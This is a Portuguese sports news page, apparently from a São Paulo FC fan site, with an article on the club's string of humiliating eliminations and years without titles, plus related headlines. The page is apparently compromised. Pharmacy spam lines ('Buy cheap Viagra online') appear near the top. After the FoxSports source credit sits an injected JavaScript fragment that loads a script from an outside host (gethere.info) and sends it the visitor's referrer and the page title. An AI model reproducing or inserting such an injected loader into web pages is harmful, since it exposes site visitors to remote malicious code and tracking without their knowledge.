Noticias

De soberano a sofredor, São Paulo não para de colecionar vexames históricos

acquire at an easy rate medications no rx to order inexpensively pills on line

Buy cheap Viagra online

Os dirigentes do São Paulo tentam o tempo todo manter a crista de “soberano”, rótulo criado pelo próprio clube, se negam a falar em crise e forçam uma pose de que tudo está sob controle. Mas, a verdade é que o Tricolor do Morumbi não vive bons momentos há longos anos e, não bastasse o jejum de títulos, tem colecionado vexames históricos dentro de campo. A eliminação da Copa do Brasil na quinta-feira foi apenas mais um caso para a lista de frustrações. A equipe são-paulina nunca havia caído diante de um adversário que disputa apenas a Série C do nacional.

E se o torcedor anda impaciente não é para menos. Antes da desclassificação ainda nas oitavas de final do torneio nunca vencido pelo São Paulo, o time deu motivos para seus seguidores se indignarem já no primeiro semestre. No Campeonato Paulista, depois de uma primeira fase sofrível, a equipe foi despachada pelo Osasco Audax, clube do quadro da Série D, por um sonoro 4 a 1.

Na Copa Libertadores, aos trancos e barrancos o São Paulo chegou à semifinal. Antes, perdeu para o The Strongest no Pacaembu por 1 a 0. A equipe boliviana não vencia uma partida fora de casa na competição continental a nada menos do que 34 anos. E o ‘privilégio’ acabou sendo dos tricolores.

A temporada anda mesmo difícil para o São Paulo, que agora só tem o Campeonato Brasileiro para jogar e com a única missão de garantir a permanência na Série A, pois a zona de rebaixamento está a apenas seis pontos de distância, enquanto o líder Palmeiras já soma 17 pontos a mais com 12 rodadas para o fim.

Isso significa mais um ano sem gritar “é campeão”. É o quarto seguido já. Não fosse o título da Copa Sul-americana em 2012, que nunca gozou de muito prestígio em território nacional, a fila partiria desde 2009. Talvez nem o mais pessimista são-paulino imaginasse um cenário desse logo após o Tri-Brasileiro de 2006, 2007 e 2008.

Em 2015, a maior crise aconteceu fora de campo, com escândalos na diretoria e renúncia do então presidente Carlos Miguel Aidar. O time, mesmo com o clima conturbado, conseguiu se manter no G4, mas a goleada para o arquirrival Corinthians por 6 a 1, em Itaquera, no clássico que marcou a entrega da taça para os alvinegros, doeu.

Mais cedo, a equipe teve de amargar duas eliminações seguidas para o Santos, ambas nas semifinais. Uma no Campeonato Paulista e outra na Copa do Brasil. O time da Baixada, aliás, se tornou um grande carrasco nos últimos anos. Diante o Peixe, o São Paulo caiu em três semifinais de Estadual seguidas (2010, 2011 e 2012) e virou motivo de chacota entre os santistas.

Os clubes pequenos também não deixaram passar em branco a maré ruim e tiraram suas casquinhas dos são-paulinos. Tão impactante quando a classificação do Juventude nesta quinta, a Ponte Preta conseguiu eliminar os “soberanos” da Copa Sul-americana em 2013, o Bragantino chegou a uma virada histórica no Morumbi para avançar na Copa do Brasil de 2014 e, no mesmo ano, o Penapolense foi quem fez a festa no estádio Cícero Pompeu de Toledo nas quartas de final do Paulistão.

Outro ponto agravante é o sucesso dos rivais. Afinal, em meio a tudo isso, Corinthians, Palmeiras e Santos são os atuais campeões, respectivamente, Brasileiro, da Copa do Brasil e Paulista. E seguem vivos na briga por mais conquistas ainda nessa temporada, enquanto o Tricolor, a pouco mais de três meses para o fim do ano, já não tem mais como ambicionar.

Pouco a pouco, o São Paulo tem perdido sua posição de destaque e tem deixado sua tão gloriosa imagem arranhar bruscamente a cada fim de campeonato. Torcedores têm sofrido como nunca diante desse momento, que para muitos já representa uma eternidade. Terminar a temporada com dignidade, sem sustos e planejar um 2017 promissor é tudo que o são-paulino espera e pode entender até como obrigação, diante da história da camisa veste.

Fonte: FoxSports.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Noticias

Mais em Noticias

Dorival Júnior sai em defesa de Cueva: “Só erra o pênalti quem bate”

saopauloadmin22 de Fevereiro de 2018

Temendo perder revelações, São Paulo se mexe para blindar a base

saopauloadmin20 de Fevereiro de 2018

Jucilei lamenta revés para o Santos e cobra atenção: “Não podemos vacilar”

saopauloadmin18 de Fevereiro de 2018

Jardine: “Classificação com amor e honra à camisa do São Paulo”

saopauloadmin17 de Fevereiro de 2018

NOVO MASSACRE: 6×1! São Paulo domina, detona no final do jogo e vence mais uma na Libertadores Sub-20, em busca do Bi!

saopauloadmin13 de Fevereiro de 2018

Presente em todos os jogos, Marcos Guilherme atinge marca histórica

saopauloadmin11 de Fevereiro de 2018

São Paulo estreia na Libertadores Sub-20 com goleada de 6 a 0

saopauloadmin10 de Fevereiro de 2018

Intensidade antes da pausa

saopauloadmin9 de Fevereiro de 2018

Presidente do São Paulo diz que o elenco não está fechado e fala sobre Victor Ferraz e de atacante

saopauloadmin8 de Fevereiro de 2018